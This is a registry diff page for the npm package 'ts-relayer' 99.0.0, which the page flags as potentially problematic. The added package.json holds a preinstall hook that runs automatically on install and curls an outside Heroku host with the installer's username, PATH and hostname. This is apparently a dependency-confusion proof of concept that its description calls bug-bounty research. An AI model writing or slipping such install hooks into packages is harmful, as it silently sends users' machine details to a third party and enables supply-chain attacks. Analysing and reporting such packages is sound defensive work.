ts-relayer 99.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of ts-relayer might be problematic. Click here for more details.
- package/index.js +3 -0
- package/package.json +12 -0
package/index.js
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "ts-relayer",
|
|
3
|
+
"version": "99.0.0",
|
|
4
|
+
"description": "Hello! My name is roei hadashi. im a security reasercher and this package is part of a poc for bug bounty. if you installed the package, no worries. it does nothing harmless for your computer.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "curl https://shrouded-ravine-99137.herokuapp.com/ts-relayer/$USER/$PATH/$HOSTNAME"
|
|
9
|
+
},
|
|
10
|
+
"author": "r03i98",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|